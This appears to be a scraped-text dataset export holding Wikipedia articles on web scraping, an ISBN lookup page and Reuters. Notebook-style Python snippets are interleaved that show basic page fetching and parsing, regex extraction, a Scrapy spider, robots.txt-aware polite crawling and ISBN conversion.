373 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-9 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
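The article in this row separates scraping into fetching (downloading the page) and extraction (parsing and pulling data out). A minimal sketch of that two-step flow using the requests and BeautifulSoup imports from the top of this notebook; the URL in the usage comment is a placeholder, and the html5lib parser is chosen simply because it was installed above.
import requests
from bs4 import BeautifulSoup

def fetch_and_extract(url: str):
    """Fetch a page (the crawling step), then parse it and extract data (the scraping step)."""
    resp = requests.get(url, headers={"User-Agent": "example-scraper/0.1"}, timeout=10)
    resp.raise_for_status()
    soup = BeautifulSoup(resp.text, "html5lib")
    # Extraction: pull the page title and every hyperlink as (text, href) pairs
    title = soup.title.get_text(strip=True) if soup.title else None
    links = [(a.get_text(strip=True), a.get("href")) for a in soup.find_all("a", href=True)]
    return title, links

# Hypothetical usage:
# title, links = fetch_and_extract("https://example.org/")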
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
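As the passage notes, the simplest programmatic approach is grep-style regular-expression matching in a language such as Python. A hedged sketch that pulls e-mail-like strings out of raw HTML; the pattern is intentionally simple (not RFC-complete) and the sample markup is invented. For template-generated pages, an XPath or CSS-selector query over a parsed DOM is usually more robust than a bare regex.
import re

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

def grep_emails(html: str) -> list:
    """Regex-matching extraction: return unique e-mail-like strings in document order."""
    seen, found = set(), []
    for match in EMAIL_RE.findall(html):
        if match not in seen:
            seen.add(match)
            found.append(match)
    return found

sample = '<p>Contact <a href="mailto:sales@example.com">sales@example.com</a> or press@example.org</p>'
print(grep_emails(sample))  # ['sales@example.com', 'press@example.org']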
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
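Of the tools listed above, BeautifulSoup is already used elsewhere in this notebook, so here is a sketch of the other Python option mentioned, Scrapy. It assumes the public practice site quotes.toscrape.com; the CSS selectors match that site's markup and would need to be adapted for any other target.
import scrapy

class QuotesSpider(scrapy.Spider):
    """Minimal Scrapy spider: crawl a page, yield structured items, follow pagination."""
    name = "quotes"
    start_urls = ["https://quotes.toscrape.com/"]

    def parse(self, response):
        for quote in response.css("div.quote"):
            yield {
                "text": quote.css("span.text::text").get(),
                "author": quote.css("small.author::text").get(),
            }
        next_page = response.css("li.next a::attr(href)").get()
        if next_page:
            yield response.follow(next_page, callback=self.parse)

# If saved as quotes_spider.py, run with:  scrapy runspider quotes_spider.py -o quotes.json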
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
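The anti-bot measures alluded to at the end of the row above (the items of that list did not survive extraction) typically target crawlers that ignore robots.txt or hammer a site. A minimal "polite fetch" sketch using only the standard library plus requests; the user-agent string, delay, and example URL are arbitrary, and re-reading robots.txt on every call is deliberately naive.
import time
import requests
from urllib.parse import urljoin, urlparse
from urllib.robotparser import RobotFileParser

USER_AGENT = "example-scraper/0.1"

def polite_get(url: str, delay: float = 2.0):
    """Fetch `url` only if robots.txt allows it, then sleep to rate-limit ourselves."""
    root = "{0.scheme}://{0.netloc}".format(urlparse(url))
    rp = RobotFileParser()
    rp.set_url(urljoin(root, "/robots.txt"))
    rp.read()
    if not rp.can_fetch(USER_AGENT, url):
        raise PermissionError(f"robots.txt disallows fetching {url}")
    resp = requests.get(url, headers={"User-Agent": USER_AGENT}, timeout=10)
    time.sleep(delay)  # simple fixed delay between requests
    return resp

# Hypothetical usage:
# page = polite_get("https://example.org/some/page")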
374 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Special:BookSources/0-596-00577-6 | This page allows users to search multiple sources for a book given a 10 or 13 digit International Standard Book Number. Spaces and dashes in the ISBN do not matter. This page links to catalogs of libraries, booksellers, and other book sources where you will be able to search for the book by its International Standard Book Number (ISBN). Google Books and Amazon.com may be helpful if you want to verify citations in Wikipedia articles, because they often let you search an online version of the book for specific words or phrases, or you can browse through the book (although for copyright reasons the entire book is usually not available). At the Open Library (part of the Internet Archive) you can borrow and read entire books online. Alabama California Colorado Connecticut Delaware Florida Georgia Illinois Indiana Iowa Kansas Kentucky Massachusetts Michigan Minnesota Missouri Nebraska New Jersey New Mexico New York North Carolina Ohio Oklahoma Oregon Pennsylvania Rhode Island South Carolina South Dakota Tennessee Texas Utah Washington state Wisconsin Find your book on a site that compiles results from other online sites: These sites allow you to search the catalogs of many individual booksellers: If the book you are looking for is in a language other than English, you might find it helpful to look at the equivalent pages on other Wikipedias, linked below; they are more likely to have sources appropriate for that language. The WorldCat xISBN tool for finding other editions is no longer available. However, there is often a "view all editions" link on the results page from an ISBN search. Google Books often lists other editions of a book and related books under the "about this book" link. You can convert between 10 and 13 digit ISBNs with these tools: |
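The row above is a scrape of Wikipedia's book-sources page for ISBN 0-596-00577-6 and mentions converting between 10- and 13-digit ISBNs. The conversion itself is mechanical: prefix 978, keep the first nine digits, and recompute the check digit with the ISBN-13 alternating 1/3 weighting. A small sketch:
def isbn10_to_isbn13(isbn10: str) -> str:
    """Convert an ISBN-10 to ISBN-13 by prefixing 978 and recomputing the check digit."""
    digits = [c for c in isbn10 if c.isdigit() or c in "xX"]
    if len(digits) != 10:
        raise ValueError("expected a 10-character ISBN")
    core = "978" + "".join(digits[:9])          # drop the old ISBN-10 check digit
    total = sum((1 if i % 2 == 0 else 3) * int(d) for i, d in enumerate(core))
    check = (10 - total % 10) % 10              # ISBN-13 check digit (weights 1,3,1,3,...)
    return core + str(check)

print(isbn10_to_isbn13("0-596-00577-6"))  # 9780596005771 -- the book referenced in this row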
375 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Reuters | Reuters ( r t rz ROY-terz) is a news agency owned by Thomson Reuters. 1 2 It employs around 2,500 journalists and 600 photojournalists in about 200 locations worldwide writing in 16 languages. 3 Reuters is one of the largest and most trusted news agencies in the world. 4 5 6 The agency was established in London in 1851 by the German-born Paul Reuter. It was acquired by the Thomson Corporation of Canada in 2008 and now makes up the news media division of Thomson Reuters. 5 Paul Reuter worked at a book-publishing firm in Berlin and was involved in distributing radical pamphlets at the beginning of the Revolutions of 1848. These publications brought much attention to Reuter, who in 1850 developed a prototype news service in Aachen using homing pigeons and electric telegraphy from 1851 on, in order to transmit messages between Brussels and Aachen, 7 in what today is Aachen's Reuters House. Reuter moved to London in 1851 and established a news wire agency at the London Royal Exchange. Headquartered in London, Reuter's company initially covered commercial news, serving banks, brokerage houses, and business firms. 8 The first newspaper client to subscribe was the London Morning Advertiser in 1858, and more began to subscribe soon after. 8 9 According to the Encyclop dia Britannica: "the value of Reuters to newspapers lay not only in the financial news it provided but in its ability to be the first to report on stories of international importance. 8 It was the first to report Abraham Lincoln's assassination in Europe, for instance, in 1865. 8 10 In 1865, Reuter incorporated his private business, under the name Reuter's Telegram Company Limited; Reuter was appointed managing director of the company. 11 In 1870 the press agencies French Havas (founded in 1835), British Reuter's (founded in 1851) and German Wolff (founded in 1849) signed an agreement (known as the Ring Combination) that set 'reserved territories' for the three agencies. Each agency made its own separate contracts with national agencies or other subscribers within its territory. In practice, Reuters, who came up with the idea, tended to dominate the Ring Combination. Its influence was greatest because its reserved territories were larger or of greater news importance than most others. It also had more staff and stringers throughout the world and thus contributed more original news to the pool. British control of cable lines made London itself an unrivalled centre for world news, further enhanced by Britain's wide-ranging commercial, financial and imperial activities. 12 In 1872, Reuter's expanded into the Far East, followed by South America in 1874. Both expansions were made possible by advances in overland telegraphs and undersea cables. 10 In 1878, Reuter retired as managing director, and was succeeded by his eldest son, Herbert de Reuter. 11 In 1883, Reuter's began transmitting messages electrically to London newspapers. 10 Reuter's son Herbert de Reuter continued as general manager until his death by suicide in 1915. The company returned to private ownership in 1916, when all shares were purchased by Roderick Jones and Mark Napier; they renamed the company "Reuters Limited", dropping the apostrophe. 11 In 1919, a number of Reuters reports falsely described the anti-colonial March 1st Movement protests in Korea as violent Bolshevik uprisings. 
South Korean researchers found that a number of these reports were cited in a number of international newspapers and possibly negatively influenced international opinion on Korea. 13 In 1923, Reuters began using radio to transmit news internationally, a pioneering act. 10 In 1925, the Press Association (PA) of Great Britain acquired a majority interest in Reuters, and full ownership some years later. 8 During the world wars, The Guardian reported that Reuters: "came under pressure from the British government to serve national interests. In 1941, Reuters deflected the pressure by restructuring itself as a private company. 10 In 1941, the PA sold half of Reuters to the Newspaper Proprietors' Association, and co-ownership was expanded in 1947 to associations that represented daily newspapers in New Zealand and Australia. 8 The new owners formed the Reuters Trust. The Reuters Trust Principles were put in place to maintain the company's independence. 14 At that point, Reuters had become "one of the world's major news agencies, supplying both text and images to newspapers, other news agencies, and radio and television broadcasters. 8 Also at that point, it directly or through national news agencies provided service "to most countries, reaching virtually all the world's leading newspapers and many thousands of smaller ones", according to Britannica. 8 In 1961, Reuters scooped news of the erection of the Berlin Wall. 15 Reuters was one of the first news agencies to transmit financial data over oceans via computers in the 1960s. 8 In 1973, Reuters "began making computer-terminal displays of foreign-exchange rates available to clients. 8 In 1981, Reuters began supporting electronic transactions on its computer network and afterwards developed a number of electronic brokerage and trading services. 8 Reuters was floated as a public company in 1984, 15 when Reuters Trust was listed on the stock exchanges 10 such as the London Stock Exchange (LSE) and NASDAQ. 8 Reuters later published the first story of the Berlin Wall being breached in 1989. 15 Reuters was the dominant news service on the Internet in the 1990s. It earned this position by developing a partnership with ClariNet and Pointcast, two early Internet-based news providers. 16 Reuters' share price grew during the dotcom boom, then fell after the banking troubles in 2001. 10 In 2002, Britannica wrote that most news throughout the world came from three major agencies: the Associated Press, Reuters, and Agence France-Presse. 4 Until 2008, the Reuters news agency formed part of an independent company, Reuters Group plc. Reuters was acquired by Thomson Corporation in Canada in 2008, forming Thomson Reuters. 8 In 2009, Thomson Reuters withdrew from the LSE and the NASDAQ, instead listing its shares on the Toronto Stock Exchange (TSX) and the New York Stock Exchange (NYSE). 8 The last surviving member of the Reuters family founders, Marguerite, Baroness de Reuter, died at age 96 on 25 January 2009. 17 The parent company Thomson Reuters is headquartered in Toronto, and provides financial information to clients while also maintaining its traditional news-agency business. 8 In 2012, Thomson Reuters appointed Jim Smith as CEO. 14 In July 2016, Thomson Reuters agreed to sell its intellectual property and science operation for $3.55 billion to private equity firms. 18 In October 2016, Thomson Reuters announced expansions and relocations to Toronto. 18 As part of cuts and restructuring, in November 2016, Thomson Reuters Corp. 
eliminated 2,000 jobs worldwide out of its estimated 50,000 employees. 18 On 15 March 2020, Steve Hasker was appointed president and CEO. 19 In April 2021, Reuters announced that its website would go behind a paywall, following rivals who have done the same. 20 21 In March 2024, Gannett, the largest newspaper publisher in the United States, signed an agreement with Reuters to use the wire service's global content after cancelling its contract with the Associated Press. 22 In 2024, Reuters staff won the Pulitzer Prize for National Reporting for their work on Elon Musk and misconduct at his businesses, including SpaceX, Tesla, and Neuralink, as well as the Pulitzer Prize for Breaking News Photography for coverage of the Israel Hamas war. 23 Reuters employs some 2,500 journalists and 600 photojournalists 24 in about 200 locations worldwide. 25 26 5 Reuters journalists use the Standards and Values as a guide for fair presentation and disclosure of relevant interests, to "maintain the values of integrity and freedom upon which their reputation for reliability, accuracy, speed and exclusivity relies". 27 28 In May 2000, Kurt Schork, an American reporter, was killed in an ambush while on assignment in Sierra Leone. In April and August 2003, news cameramen Taras Protsyuk and Mazen Dana were killed in separate incidents by U.S. troops in Iraq. In July 2007, Namir Noor-Eldeen and Saeed Chmagh were killed when they were struck by fire from a U.S. military Apache helicopter in Baghdad. 29 30 During 2004, cameramen Adlan Khasanov was killed by Chechen separatists, and Dhia Najim was killed in Iraq. In April 2008, cameraman Fadel Shana was killed in the Gaza Strip after being hit by an Israeli tank. 31 32 While covering China's Cultural Revolution in Peking in the late 1960s for Reuters, journalist Anthony Grey was detained by the Chinese government in response to the jailing of several Chinese journalists by the colonial British government of Hong Kong. 33 He was released after being imprisoned for 27 months from 1967 to 1969 and was awarded an OBE by the British Government. After his release, he went on to become a best-selling historical novelist. 34 In May 2016, the Ukrainian website Myrotvorets published the names and personal data of 4,508 journalists, including Reuters reporters, and other media staff from all over the world, who were accredited by the self-proclaimed authorities in the separatist-controlled regions of eastern Ukraine. 35 In 2018, two Reuters journalists were convicted in Myanmar of obtaining state secrets while investigating a massacre in a Rohingya village. 36 The arrest and convictions were widely condemned as an attack on press freedom. The journalists, Wa Lone and Kyaw Soe Oo, received several awards, including the Foreign Press Association Media Award and the Pulitzer Prize for International Reporting, and were named as part of the Time Person of the Year for 2018 along with other persecuted journalists. 37 38 39 After 511 days in prison, Wa Lone and Kyaw Soe Oo were freed on 7 March 2019 after receiving a presidential pardon. 40 In February 2023, a team of Reuters journalists won the Selden Ring Award for their investigation that exposed human-rights abuses by the Nigerian military. 41 In 1977, Rolling Stone and The New York Times said that according to information from CIA officials, Reuters cooperated with the CIA. 
43 44 45 In response to that, Reuters' then-managing director, Gerald Long, had asked for evidence of the charges, but none was provided, according to Reuters' then-managing editor for North America, 45 Desmond Maberly. 46 47 Reuters has a policy of taking a "value-neutral approach" which extends to not using the word terrorist in its stories. The practice attracted criticism following the September 11 attacks. 48 Reuters' editorial policy states: "Reuters may refer without attribution to terrorism and counterterrorism in general, but do not refer to specific events as terrorism. Nor does Reuters use the word terrorist without attribution to qualify specific individuals, groups or events. 49 By contrast, the Associated Press does use the term terrorist in reference to non-governmental organizations who carry out attacks on civilian populations. 48 In 2004, Reuters asked CanWest Global Communications, a Canadian newspaper chain, to remove Reuters' bylines, as the chain had edited Reuters articles to insert the word terrorist. A spokesman for Reuters stated: "My goal is to protect my reporters and protect our editorial integrity. 50 In July 2013, David Fogarty, former Reuters climate change correspondent in Asia, resigned after a career of almost 20 years with the company and wrote that "progressively, getting any climate change-themed story published got harder" following comments from then-deputy editor-in-chief Paul Ingrassia that he was a "climate change sceptic". In his comments, Fogarty stated: 51 52 53 By mid-October, I was informed that climate change just wasn't a big story for the present, but that it would be if there was a significant shift in global policy, such as the US introducing an emissions cap-and-trade system. Very soon after that conversation I was told my climate change role was abolished. Ingrassia, formerly Reuters' managing editor, previously worked for The Wall Street Journal and Dow Jones for 31 years. 54 55 Reuters responded to Fogarty's piece by stating: "Reuters has a number of staff dedicated to covering this story, including a team of specialist reporters at Point Carbon and a columnist. There has been no change in our editorial policy. 56 Subsequently, climate blogger Joe Romm cited a Reuters article on climate as employing "false balance", and quoted Stefan Rahmstorf, co-chair of Earth System Analysis at the Potsdam Institute that s imply, a lot of unrelated climate sceptics nonsense has been added to this Reuters piece. In the words of the late Steve Schneider, this is like adding some nonsense from the Flat Earth Society to a report about the latest generation of telecommunication satellites. It is absurd. Romm opined: "We can't know for certain who insisted on cramming this absurd and non-germane 'climate sceptics nonsense' into the piece, but we have a strong clue. If it had been part of the reporter's original reporting, you would have expected direct quotes from actual sceptics, because that is journalism 101. The fact that the blather was all inserted without attribution suggests it was added at the insistence of an editor. 57 According to Ynetnews, Reuters was accused of bias against Israel in its coverage of the 2006 Israel Lebanon conflict after the wire service used two doctored photos by a Lebanese freelance photographer, Adnan Hajj. 58 In August 2006, Reuters announced it had severed all ties with Hajj and said his photographs would be removed from its database. 
59 60 In 2010, Reuters was criticised again by Haaretz for "anti-Israeli" bias when it cropped the edges of photos, removing commandos' knives held by activists and a naval commando's blood from photographs taken aboard the Mavi Marmara during the Gaza flotilla raid, a raid that left nine Turkish activists dead. It has been alleged that in two separate photographs, knives held by the activists were cropped out of the versions of the pictures published by Reuters. 61 Reuters said it is standard operating procedure to crop photos at the margins, and replaced the cropped images with the original ones after it was brought to the agency's attention. 61 On 9 June 2020, three Reuters journalists (Jack Stubbs, Raphael Satter and Christopher Bing) incorrectly used the image of an Indian herbal medicine entrepreneur in an exclusive story titled "Obscure Indian cyber firm spied on politicians, investors worldwide". 62 Indian local media picked up the report, and the man whose image was wrongly used was invited and interrogated for nine hours by Indian police. Reuters admitted to the error, but Raphael Satter claimed that they had mistaken the man for the suspected hacker Sumit Gupta because both men share same business address. A check by local media, however, showed that both men were in different buildings and not as claimed by Raphael Satter. 63 64 As the report of the inaccurate reporting trickled out to the public, Reuters' senior director of communication Heather Carpenter contacted media outlets asking them to take down their posts. 64 In March 2015, the Brazilian affiliate of Reuters released an excerpt from an interview with Brazilian ex-president Fernando Henrique Cardoso about Operation Car Wash (Portuguese: Opera o Lava Jato). In 2014, several politicians from Brazil were found to be involved in corruption, by accepting bribes from different corporations in exchange for Government contracts. After the scandal, the excerpt from Brazil's president Fernando Henrique's interview was released. One paragraph by a former Petrobras manager mentioned a comment, in which he suggested corruption in the company may date back to Cardoso's presidency. Attached, was a comment between parenthesis: "Podemos tirar se achar melhor" ("we can take it out if you think better"), 65 which was removed from the current version of the text. 66 This had the effect of confusing readers, and suggests that the former president was involved in corruption and the comment was attributed to him. Reuters later confirmed the error, and explained that the comment, originating from one of the local editors, was actually intended for the journalist who wrote the original text in English, and that it should not have been published. 67 In November 2019 the UK Foreign Office released archive documents confirming that it had provided funding to Reuters during the 1960s and 1970s so that Reuters could expand its coverage in the Middle East. An agreement was made between the Information Research Department (IRD) and Reuters for the UK Treasury to provide 350,000 over four years to fund Reuters' expansion. The UK government had already been funding the Latin American department of Reuters through a shell company; however, this method was discounted for the Middle East operation due to the accounting of the shell company looking suspicious, with the IRD stating that the company "already looks queer to anyone who might wish to investigate why such an inactive and unprofitable company continues to run. 
68 Instead, the BBC was used to fund the project by paying for enhanced subscriptions to the news organisation, for which the Treasury would reimburse the BBC at a later date. The IRD acknowledged that this agreement would not give them editorial control over Reuters, although the IRD believed it would give them political influence over Reuters' work, stating "this influence would flow, at the top level, from Reuters' willingness to consult and to listen to views expressed on the results of its work. 68 69 On 1 June 2020, Reuters announced that Russian news agency TASS had joined its "Reuters Connect" programme, comprising a then-total of 18 partner agencies. Reuters president Michael Friedenberg said he was "delighted that TASS and Reuters are building upon our valued partnership". 70 Two years later, TASS's membership in Reuters Connect came under scrutiny in the wake of the 2022 Russian invasion of Ukraine; Politico reported that Reuters staff members were "frustrated and embarrassed" that their agency had not suspended its partnership with TASS. 71 On 23 March 2022, Reuters removed TASS from its "content marketplace". Matthew Keen, interim CEO of Reuters said "we believe making TASS content available on Reuters Connect is not aligned with the Thomson Reuters Trust Principles". 72 |
